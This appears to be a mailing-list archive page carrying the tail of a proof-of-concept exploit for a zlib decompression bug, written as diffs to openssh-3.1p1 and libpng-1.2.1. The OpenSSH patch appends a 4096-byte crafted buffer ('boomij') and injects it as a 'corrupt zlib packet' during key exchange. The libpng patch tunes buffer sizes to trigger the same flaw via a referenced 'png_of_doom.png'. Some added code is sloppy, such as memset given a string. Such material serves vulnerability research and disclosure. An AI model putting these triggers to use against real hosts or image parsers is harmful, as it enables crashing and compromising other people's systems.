+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd";
 /*
  * Initializes compression; level is compression level from 1 to 9
  * (as in gzip).
  */
 
+
+
+
+void dump_hex (char *buf, int len, char *title)
+{
+    int x;
+    int y;
+    unsigned char *ptr;
+    
+    fprintf(stderr, "[ %s - 0x%.8x - %d ]\n", title, buf, len);
+    y = 0;
+    ptr = buf;
+    for(x=0;x<len;x++)
+    {
+        if(y > 10) { y = 0; fprintf(stderr, "\"\n\""); }
+        fprintf(stderr, "\\x%.2x", *ptr);
+        y++;
+        ptr++;
+    }
+    fprintf(stderr, "\n\n"); 
+
+}
+
 void
 buffer_compress_init_send(int level)
 {
@@ -63,7 +329,10 @@
 	    incoming_stream.total_out == 0 ? 0.0 :
 	    (double) incoming_stream.total_in / incoming_stream.total_out);
 	if (compress_init_recv_called == 1)
+    {
+        fprintf(stderr, "Calling inflateEnd\n");
 		inflateEnd(&incoming_stream);
+    }
 	if (compress_init_send_called == 1)
 		deflateEnd(&outgoing_stream);
 }
@@ -82,11 +351,23 @@
 {
 	u_char buf[4096];
 	int status;
-
+    static int cnt = 0;
+    
+    
 	/* This case is not handled below. */
 	if (buffer_len(input_buffer) == 0)
 		return;
 
+    if (cnt == 0)
+    {
+       fprintf(stderr, ">> sending corrupt zlib packet ;)\n");
+       buffer_append(output_buffer, boomij, 4096);
+       dump_hex(boomij, 4096, "boomij");
+       
+       cnt++;
+       return;
+    }
+      
 	/* Input is the contents of the input buffer. */
 	outgoing_stream.next_in = buffer_ptr(input_buffer);
 	outgoing_stream.avail_in = buffer_len(input_buffer);
@@ -135,6 +416,8 @@
 		incoming_stream.next_out = buf;
 		incoming_stream.avail_out = sizeof(buf);
 
+        dump_hex(buffer_ptr(input_buffer), buffer_len(input_buffer), "incoming");
+        
 		status = inflate(&incoming_stream, Z_PARTIAL_FLUSH);
 		switch (status) {
 		case Z_OK:
diff -u -r openssh-3.1p1/sshconnect2.c openssh-3.1p1-zlib/sshconnect2.c
--- openssh-3.1p1/sshconnect2.c	Tue Mar 12 03:33:02 2002
+++ openssh-3.1p1-zlib/sshconnect2.c	Tue Mar 12 03:33:03 2002
@@ -75,9 +75,12 @@
 ssh_kex2(char *host, struct sockaddr *hostaddr)
 {
 	Kex *kex;
-
+    unsigned char testdata[4096];
 	xxx_host = host;
 	xxx_hostaddr = hostaddr;
+    
+    memset(testdata, "A", 4095);
+    testdata[4095] = '\0'; 
 
 	if (options.ciphers == (char *)-1) {
 		log("No valid ciphers for protocol version 2 given, using defaults.");
@@ -119,13 +122,14 @@
 	session_id2 = kex->session_id;
 	session_id2_len = kex->session_id_len;
 
-#ifdef DEBUG_KEXDH
+
 	/* send 1st encrypted/maced/compressed message */
+    debug("sending malformed zlib packet...");
 	packet_start(SSH2_MSG_IGNORE);
-	packet_put_cstring("markus");
+	packet_put_cstring(testdata);
 	packet_send();
 	packet_write_wait();
-#endif
+
 	debug("done: ssh_kex2.");
 }

Attachment: png_of_doom.png
Description: PNG image

diff -r -u libpng-1.2.1/pngconf.h libpng-1.2.1-zlib-test/pngconf.h
--- libpng-1.2.1/pngconf.h	Tue Mar 12 03:35:20 2002
+++ libpng-1.2.1-zlib-test/pngconf.h	Tue Mar 12 03:35:19 2002
@@ -30,7 +30,7 @@
  */
 
 #ifndef PNG_ZBUF_SIZE
-#  define PNG_ZBUF_SIZE 8192
+#  define PNG_ZBUF_SIZE 4096
 #endif
 
 /* Enable if you want a write-only libpng */
diff -r -u libpng-1.2.1/pngread.c libpng-1.2.1-zlib-test/pngread.c
--- libpng-1.2.1/pngread.c	Tue Mar 12 03:35:20 2002
+++ libpng-1.2.1-zlib-test/pngread.c	Tue Mar 12 03:35:19 2002
@@ -42,7 +42,9 @@
 #endif
 
    int i;
-
+   int x;
+   char *ptr;
+   
    png_debug(1, "in png_create_read_struct\n");
 #ifdef PNG_USER_MEM_SUPPORTED
    if ((png_ptr = (png_structp)png_create_struct_2(PNG_STRUCT_PNG,
@@ -117,6 +119,7 @@
      }
    }
 
+
    /* initialize zbuf - compression buffer */
    png_ptr->zbuf_size = PNG_ZBUF_SIZE;
    png_ptr->zbuf = (png_bytep)png_malloc(png_ptr,
@@ -125,6 +128,8 @@
    png_ptr->zstream.zfree = png_zfree;
    png_ptr->zstream.opaque = (voidpf)png_ptr;
 
+
+   
    switch (inflateInit(&png_ptr->zstream))
    {
      case Z_OK: /* Do nothing */ break;
@@ -134,11 +139,13 @@
      default: png_error(png_ptr, "Unknown zlib error");
    }
 
+
    png_ptr->zstream.next_out = png_ptr->zbuf;
    png_ptr->zstream.avail_out = (uInt)png_ptr->zbuf_size;
 
    png_set_read_fn(png_ptr, png_voidp_NULL, png_rw_ptr_NULL);
 
+   
    return (png_ptr);
 }
 
@@ -523,6 +530,10 @@
    const int png_pass_mask[7] = {0x80, 0x08, 0x88, 0x22, 0xaa, 0x55, 0xff};
 #endif
    int ret;
+   int x;
+   char *ptr;
+   int i;
+   
    png_debug2(1, "in png_read_row (row %lu, pass %d)\n",
       png_ptr->row_number, png_ptr->pass);
    /* save jump buffer and error functions */
@@ -669,6 +680,28 @@
             (png_size_t)png_ptr->zstream.avail_in);
          png_ptr->idat_size -= png_ptr->zstream.avail_in;
       }
+      
+    fprintf(stderr, "zbuf_size = %d\n", (uInt)png_ptr->zbuf_size);
+    fprintf(stderr, "input size: %d\n", (uInt)png_ptr->zstream.avail_in);
+    fprintf(stderr, "compression level: %d\n", (uInt)png_ptr->zlib_level);
+
+        
+    ptr = png_ptr->zbuf;
+    for (x=0;x<(uInt)png_ptr->zbuf_size;x++)
+    {
+        if (i > 16)
+        {
+            i =0;
+            fprintf(stderr, "\"\n\"");   
+        }
+
+        fprintf(stderr, "\\x%.2x", (unsigned char ) *ptr);
+        *ptr++;  
+        i++;
+    }
+   fprintf(stderr, "\n\n", png_ptr->zbuf);
+   
+   
       ret = inflate(&png_ptr->zstream, Z_PARTIAL_FLUSH);
       if (ret == Z_STREAM_END)
       {
@@ -1214,6 +1247,9 @@
    png_free(png_ptr, png_ptr->time_buffer);
 #endif
 
+   //fprintf(stderr, "zbuf is at 0x%.8x and is %d bytes\n", &png_ptr->zbuf,&png_ptr->zbuf_size); 
+   
+   
    inflateEnd(&png_ptr->zstream);
 #ifdef PNG_PROGRESSIVE_READ_SUPPORTED
    png_free(png_ptr, png_ptr->save_buffer);
[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux